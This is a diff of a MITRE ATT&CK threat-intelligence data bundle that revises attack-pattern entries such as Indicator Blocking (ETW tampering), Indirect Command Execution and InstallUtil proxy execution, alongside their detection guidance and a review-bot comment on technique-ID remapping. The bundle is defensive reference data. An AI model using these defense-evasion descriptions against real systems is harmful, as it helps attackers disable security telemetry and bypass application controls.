+ "created": "2017-05-31T21:30:47.384Z",
+ "modified": "2020-03-19T19:10:25.404Z",
+ "type": "attack-pattern",
"revoked": true,
"external_references": [
{
@@ -12488,12 +12990,16 @@
}
],
"name": "Indicator Blocking",
- "id": "attack-pattern--6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df",
- "type": "attack-pattern",
- "modified": "2020-03-19T19:10:25.404Z",
- "created": "2017-05-31T21:30:47.384Z"
+ "id": "attack-pattern--6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df"
},
{
+ "id": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da",
+ "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ",
+ "name": "Indicator Blocking",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -12521,13 +13027,6 @@
"description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Indicator Blocking",
- "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ",
- "id": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -12535,10 +13034,12 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-19T19:20:39.087Z",
+ "modified": "2020-07-09T14:43:42.450Z",
"created": "2020-03-19T19:09:30.329Z",
"x_mitre_platforms": [
- "Windows"
+ "Windows",
+ "macOS",
+ "Linux"
],
"x_mitre_contributors": [
"Rob Smith"
@@ -12596,26 +13097,26 @@
],
"modified": "2020-03-29T21:03:09.766Z",
"created": "2020-03-19T21:27:32.820Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Host intrusion prevention systems",
- "Log analysis",
- "Signature-based detection"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
- "x_mitre_detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters",
"Anti-virus",
"Binary file metadata"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.",
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host intrusion prevention systems",
+ "Log analysis",
+ "Signature-based detection"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
@@ -12625,8 +13126,8 @@
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551",
- "url": "https://attack.mitre.org/techniques/T1551"
+ "external_id": "T1070",
+ "url": "https://attack.mitre.org/techniques/T1070"
},
{
"external_id": "CAPEC-93",
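Review bot: The primary `external_id` for this attack-pattern changes from `T1551` to `T1070` (and its `url` accordingly) while the STIX `id` stays the same, so anything downstream that keys on the technique string rather than the STIX identifier — test folders, YAML `attack_technique` fields, or coverage scripts, if this repository uses them that way — will silently stop matching this object after the sync. The same class of lookup break applies to the `x_mitre_defense_bypassed` value renames later in the diff ("Process whitelisting" → "Application control", "Application whitelisting"/"Whitelisting by file name or path" → "Application control"/"Application control by file name or path"), where filters on the old enum strings would return nothing. It would be worth pairing this data refresh with a check that every referenced technique ID and defense string still resolves against the new bundle, and recording the `T1551` → `T1070` remap in the commit description so consumers know to update their mappings.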
@@ -12646,9 +13147,17 @@
],
"modified": "2020-03-29T21:43:29.196Z",
"created": "2017-05-31T21:30:55.892Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system may require different detection mechanisms.",
+ "x_mitre_defense_bypassed": [
+ "Log analysis",
+ "Host intrusion prevention systems",
+ "Anti-virus"
],
"x_mitre_data_sources": [
"File monitoring",
@@ -12657,24 +13166,15 @@
"API monitoring",
"Windows event logs"
],
- "x_mitre_defense_bypassed": [
- "Log analysis",
- "Host intrusion prevention systems",
- "Anti-virus"
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
],
- "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system may require different detection mechanisms.",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
- "id": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Indirect Command Execution",
- "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -12697,9 +13197,10 @@
"source_name": "RSA Forfiles Aug 2017"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.",
+ "name": "Indirect Command Execution",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -12707,7 +13208,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-02-05T14:28:08.379Z",
+ "modified": "2020-06-20T22:09:22.559Z",
"created": "2018-04-18T17:59:24.739Z",
"x_mitre_version": "1.1",
"x_mitre_contributors": [
@@ -12721,9 +13222,8 @@
],
"x_mitre_defense_bypassed": [
"Static File Analysis",
- "Application whitelisting",
- "Process whitelisting",
- "Whitelisting by file name or path"
+ "Application control",
+ "Application control by file name or path"
],
"x_mitre_detection": "Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)",
"x_mitre_permissions_required": [
@@ -12735,10 +13235,9 @@
"x_mitre_is_subtechnique": false
},
{
- "id": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Ingress Tool Transfer",
- "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -12751,9 +13250,10 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.",
+ "name": "Ingress Tool Transfer",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -12816,15 +13316,21 @@
"phase_name": "impact"
}
],
- "modified": "2019-07-19T14:37:37.347Z",
+ "modified": "2020-07-14T19:33:52.512Z",
"created": "2019-04-02T13:54:43.136Z",
- "x_mitre_contributors": [
- "Yonatan Gotlib, Deep Instinct"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
],
- "x_mitre_impact_type": [
- "Availability"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "root",
+ "SYSTEM",
+ "User"
],
- "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.\n\nMonitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\PreviousVersions\\DisableLocalPage).",
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Windows Registry",
"Services",
@@ -12832,17 +13338,12 @@
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "Administrator",
- "root",
- "SYSTEM",
- "User"
+ "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.\n\nMonitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\PreviousVersions\\DisableLocalPage).",
+ "x_mitre_impact_type": [
+ "Availability"
],
- "x_mitre_platforms": [
- "Windows",
- "macOS",
- "Linux"
+ "x_mitre_contributors": [
+ "Yonatan Gotlib, Deep Instinct"
]
},
{
@@ -12883,19 +13384,10 @@
],
"modified": "2020-03-24T21:29:13.900Z",
"created": "2017-05-31T21:30:48.323Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "John Lambert, Microsoft Threat Intelligence Center"
],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "root",
- "User"
- ],
- "x_mitre_detection": "Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.",
"x_mitre_data_sources": [
"Windows Registry",
"Windows event logs",
@@ -12909,10 +13401,19 @@
"Binary file metadata",
"API monitoring"
],
- "x_mitre_contributors": [
- "John Lambert, Microsoft Threat Intelligence Center"
+ "x_mitre_detection": "Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "root",
+ "User"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--91ce1ede-107f-4d8b-bf4c-735e8789c94b",
@@ -13073,19 +13574,10 @@
],
"modified": "2020-03-19T20:31:11.389Z",
"created": "2020-02-21T21:05:32.844Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation"
- ],
- "x_mitre_detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072",
- "x_mitre_data_sources": [
- "SSL/TLS inspection",
- "Digital certificate logs"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
"x_mitre_contributors": [
"Matt Graeber, @mattifestation, SpecterOps",
@@ -13093,11 +13585,20 @@
"Travis Smith, Tripwire",
"Itzik Kotler, SafeBreach"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_data_sources": [
+ "SSL/TLS inspection",
+ "Digital certificate logs"
+ ],
+ "x_mitre_detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072",
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--f792d02f-813d-402b-86a5-ab98cb391d3b",
@@ -13126,7 +13627,7 @@
},
{
"id": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107",
- "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)",
+ "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)",
"name": "InstallUtil",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -13156,31 +13657,47 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T15:45:33.971Z",
+ "modified": "2020-06-20T22:34:46.529Z",
"created": "2020-01-23T19:09:48.811Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Process whitelisting"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process monitoring"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Travis Smith, Tripwire",
"Casey Smith"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process monitoring"
+ ],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2020-02-12T14:08:48.689Z",
+ "modified": "2020-03-28T19:34:47.546Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d",
+ "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms.",
+ "name": "Inter-Process Communication",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -13188,22 +13705,6 @@
"url": "https://attack.mitre.org/techniques/T1559"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Inter-Process Communication",
- "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms.",
- "id": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-28T19:34:47.546Z",
- "created": "2020-02-12T14:08:48.689Z",
"x_mitre_platforms": [
"Windows"
],
@@ -13255,22 +13756,22 @@
],
"modified": "2020-03-29T22:57:04.784Z",
"created": "2020-02-20T14:31:34.778Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Integrity"
],
+ "x_mitre_detection": "Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
"x_mitre_data_sources": [
"Web logs",
"Web application firewall logs",
"Packet capture"
],
- "x_mitre_detection": "Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
- "x_mitre_impact_type": [
- "Integrity"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -13306,11 +13807,9 @@
],
"modified": "2020-03-15T00:46:26.598Z",
"created": "2020-03-14T23:08:20.244Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Process use of network",
"Process monitoring",
@@ -13318,13 +13817,15 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747",
- "description": "Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)\n\nAdversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) or [Spearphishing Link](https://attack.mitre.org/techniques/T1192) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.\n\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)",
+ "description": "Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)\n\nAdversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.\n\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)",
"name": "Internal Spearphishing",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -13354,24 +13855,9 @@
"phase_name": "lateral-movement"
}
],
- "modified": "2019-10-22T21:37:05.004Z",
+ "modified": "2020-03-31T22:13:33.718Z",
"created": "2019-09-04T19:26:12.441Z",
